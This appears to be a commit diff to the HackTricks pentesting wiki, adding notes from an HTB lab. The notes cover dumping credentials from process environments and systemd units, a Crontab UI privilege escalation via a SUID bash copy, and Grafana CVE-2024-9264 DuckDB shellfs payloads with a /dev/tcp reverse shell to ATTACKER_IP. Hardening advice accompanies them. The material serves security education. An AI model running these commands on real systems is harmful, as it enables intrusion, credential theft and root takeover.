Merge pull request #1403 from HackTricks-wiki/update_HTB_Planning__Grafana_CVE-2024-9264_to_Container_R_20250913_182406

HTB Planning Grafana CVE-2024-9264 to Container Root, Env-Cr...
2025-10-10 18:36:50 +00:00 · 2025-09-30 12:08:16 +02:00 · 2025-09-30 12:08:16 +02:00 · 18df7fbb0f
commit 18df7fbb0f
parent e92ade1a39 167b0637b7
3 changed files with 145 additions and 3 deletions
--- a/src/linux-hardening/linux-post-exploitation/README.md
+++ b/src/linux-hardening/linux-post-exploitation/README.md
@ -77,8 +77,54 @@ gpg --homedir /dev/shm/fakehome/.gnupg -d /home/victim/backup/secrets.gpg
 If the secret key material is present in `private-keys-v1.d`, GPG will unlock and decrypt without prompting for a passphrase (or it will prompt if the key is protected).
 ## Harvesting credentials from process environment (containers included)
 When you gain code execution inside a service, the process often inherits sensitive environment variables. These are a gold mine for lateral movement.
 Quick wins
 - Dump your current process env: `env` or `printenv`
 - Dump another process env: `tr '\0' '\n' </proc/<PID>/environ | sed -n '1,200p'`
  - Add `strings -z /proc/<PID>/environ` if `tr`/`sed` aren’t handy
 - In containers, also check PID 1: `tr '\0' '\n' </proc/1/environ`
 What to look for
 - App secrets and admin creds (for example, Grafana sets `GF_SECURITY_ADMIN_USER`, `GF_SECURITY_ADMIN_PASSWORD`)
 - API keys, DB URIs, SMTP creds, OAuth secrets
 - Proxy and TLS overrides: `http_proxy`, `https_proxy`, `SSL_CERT_FILE`, `SSL_CERT_DIR`
 Notes
 - Many orchestrations pass sensitive settings via env; they are inherited by children and exposed to any arbitrary shell you spawn inside the process context.
 - In some cases, those creds are reused system-wide (e.g., same username/password valid for SSH on the host), enabling an easy pivot.
 ## Systemd-stored credentials in unit files (Environment=)
 Services launched by systemd may bake credentials into unit files as `Environment=` entries. Enumerate and extract them:
 ```bash
 # Unit files and drop-ins
 ls -la /etc/systemd/system /lib/systemd/system
 # Grep common patterns
 sudo grep -R "^Environment=.*" /etc/systemd/system /lib/systemd/system 2>/dev/null | sed 's/\x00/\n/g'
 # Example of a root-run web panel
 # [Service]
 # Environment="BASIC_AUTH_USER=root"
 # Environment="BASIC_AUTH_PWD=<password>"
 # ExecStart=/usr/bin/crontab-ui
 # User=root
 ```
 Operational artifacts often leak passwords (e.g., backup scripts that call `zip -P <pwd>`). Those values are frequently reused in internal web UIs (Basic-Auth) or other services.
 Hardening
 - Move secrets to dedicated secret stores (`systemd-ask-password`, `EnvironmentFile` with locked perms, or external secret managers)
 - Avoid embedding creds in unit files; prefer root-only readable drop-in files and remove them from version control
 - Rotate leaked passwords discovered during tests
 ## References
 - [0xdf – HTB Planning (Grafana env creds reuse, systemd BASIC_AUTH)](https://0xdf.gitlab.io/2025/09/13/htb-planning.html)
 - [alseambusher/crontab-ui](https://github.com/alseambusher/crontab-ui)
 - [0xdf – HTB Environment (GPG homedir relocation to decrypt loot)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
 - [GnuPG Manual – Home directory and GNUPGHOME](https://www.gnupg.org/documentation/manuals/gnupg/GPG-Configuration-Options.html#index-homedir)
--- a/src/linux-hardening/privilege-escalation/README.md
+++ b/src/linux-hardening/privilege-escalation/README.md
@ -376,6 +376,39 @@ Reading symbols from /lib/x86_64-linux-gnu/librt.so.1...
 ## Scheduled/Cron jobs
 ### Crontab UI (alseambusher) running as root – web-based scheduler privesc
 If a web “Crontab UI” panel (alseambusher/crontab-ui) runs as root and is only bound to loopback, you can still reach it via SSH local port-forwarding and create a privileged job to escalate.
 Typical chain
 - Discover loopback-only port (e.g., 127.0.0.1:8000) and Basic-Auth realm via `ss -ntlp` / `curl -v localhost:8000`
 - Find credentials in operational artifacts:
  - Backups/scripts with `zip -P <password>`
  - systemd unit exposing `Environment="BASIC_AUTH_USER=..."`, `Environment="BASIC_AUTH_PWD=..."`
 - Tunnel and login:
 ```bash
 ssh -L 9001:localhost:8000 user@target
 # browse http://localhost:9001 and authenticate
 ```
 - Create a high-priv job and run immediately (drops SUID shell):
 ```bash
 # Name: escalate
 # Command:
 cp /bin/bash /tmp/rootshell && chmod 6777 /tmp/rootshell
 ```
 - Use it:
 ```bash
 /tmp/rootshell -p   # root shell
 ```
 Hardening
 - Do not run Crontab UI as root; constrain with a dedicated user and minimal permissions
 - Bind to localhost and additionally restrict access via firewall/VPN; do not reuse passwords
 - Avoid embedding secrets in unit files; use secret stores or root-only EnvironmentFile
 - Enable audit/logging for on-demand job executions
 Check if any scheduled job is vulnerable. Maybe you can take advantage of a script being executed by root (wildcard vuln? can modify files that root uses? use symlinks? create specific files in the directory that root uses?).
 ```bash
@ -1716,6 +1749,10 @@ android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
 ## References
 - [0xdf – HTB Planning (Crontab UI privesc, zip -P creds reuse)](https://0xdf.gitlab.io/2025/09/13/htb-planning.html)
 - [alseambusher/crontab-ui](https://github.com/alseambusher/crontab-ui)
 - [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
 - [https://payatu.com/guide-linux-privilege-escalation/](https://payatu.com/guide-linux-privilege-escalation/)
 - [https://pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques-2016-152744](https://pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques-2016-152744)
--- a/src/network-services-pentesting/pentesting-web/grafana.md
+++ b/src/network-services-pentesting/pentesting-web/grafana.md
@ -10,7 +10,66 @@
 - By default it uses **SQLite3** database in **`/var/lib/grafana/grafana.db`**
  - `select user,password,database from data_source;`
 ---
 ## CVE-2024-9264 – SQL Expressions (DuckDB shellfs) post-auth RCE / LFI
 Grafana’s experimental SQL Expressions feature can evaluate DuckDB queries that embed user-controlled text. Insufficient sanitization allows attackers to chain DuckDB statements and load the community extension shellfs, which exposes shell commands via pipe-backed virtual files.
 Impact
 - Any authenticated user with VIEWER or higher can get code execution as the Grafana OS user (often grafana; sometimes root inside a container) or perform local file reads.
 - Preconditions commonly met in real deployments:
  - SQL Expressions enabled: `expressions.enabled = true`
  - `duckdb` binary present in PATH on the server
 Quick checks
 - In the UI/API, browse Admin settings (Swagger: `/swagger-ui`, endpoint `/api/admin/settings`) to confirm:
  - `expressions.enabled` is true
  - Optional: version (e.g., v11.0.0 vulnerable), datasource types, etc.
 - Shell on host: `which duckdb` must resolve for the exploit path below.
 Manual query pattern using DuckDB + shellfs
 - Abuse flow (2 queries):
  1) Install and load the shellfs extension, run a command, redirect combined output to a temp file via pipe
  2) Read back the temp file using `read_blob`
 Example SQL Expressions payloads that get passed to DuckDB:
 ```sql
 -- 1) Prepare shellfs and run command
 SELECT 1; INSTALL shellfs FROM community; LOAD shellfs;
 SELECT * FROM read_csv('CMD >/tmp/grafana_cmd_output 2>&1 |');
 -- 2) Read the output back
 SELECT content FROM read_blob('/tmp/grafana_cmd_output');
 ```
 Replace CMD with your desired command. For file-read (LFI) you can instead use DuckDB file functions to read local files.
 One-liner reverse shell example
 ```bash
 bash -c "bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"
 ```
 Embed that as CMD in the first query while you have a listener: `nc -lnvp 443`.
 Automated PoC
 - Public PoC (built on cfreal’s ten framework):
  - [https://github.com/nollium/CVE-2024-9264](https://github.com/nollium/CVE-2024-9264)
 Usage example
 ```bash
 # Confirm execution context and UID
 python3 CVE-2024-9264.py -u <USER> -p <PASS> -c id http://grafana.target
 # Launch a reverse shell
 python3 CVE-2024-9264.py -u <USER> -p <PASS> \
  -c 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"' \
  http://grafana.target
 ```
 If output shows `uid=0(root)`, Grafana is running as root (common inside some containers).
 ## References
 - [Grafana Advisory – CVE-2024-9264 (SQL Expressions RCE/LFI)](https://grafana.com/security/security-advisories/cve-2024-9264/)
 - [DuckDB shellfs community extension](https://duckdb.org/community_extensions/extensions/shellfs.html)
 - [nollium/CVE-2024-9264 PoC](https://github.com/nollium/CVE-2024-9264)
 - [cfreal/ten framework](https://github.com/cfreal/ten)
 {{#include ../../banners/hacktricks-training.md}}